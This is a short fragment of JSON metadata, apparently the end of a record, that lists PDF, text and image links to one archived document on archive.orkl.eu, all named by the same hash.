		"pdf": "https://archive.orkl.eu/4ccfa7f390952235e6b2597e67fd40f4fcf36c72.pdf",
		"text": "https://archive.orkl.eu/4ccfa7f390952235e6b2597e67fd40f4fcf36c72.txt",
		"img": "https://archive.orkl.eu/4ccfa7f390952235e6b2597e67fd40f4fcf36c72.jpg"
	}
}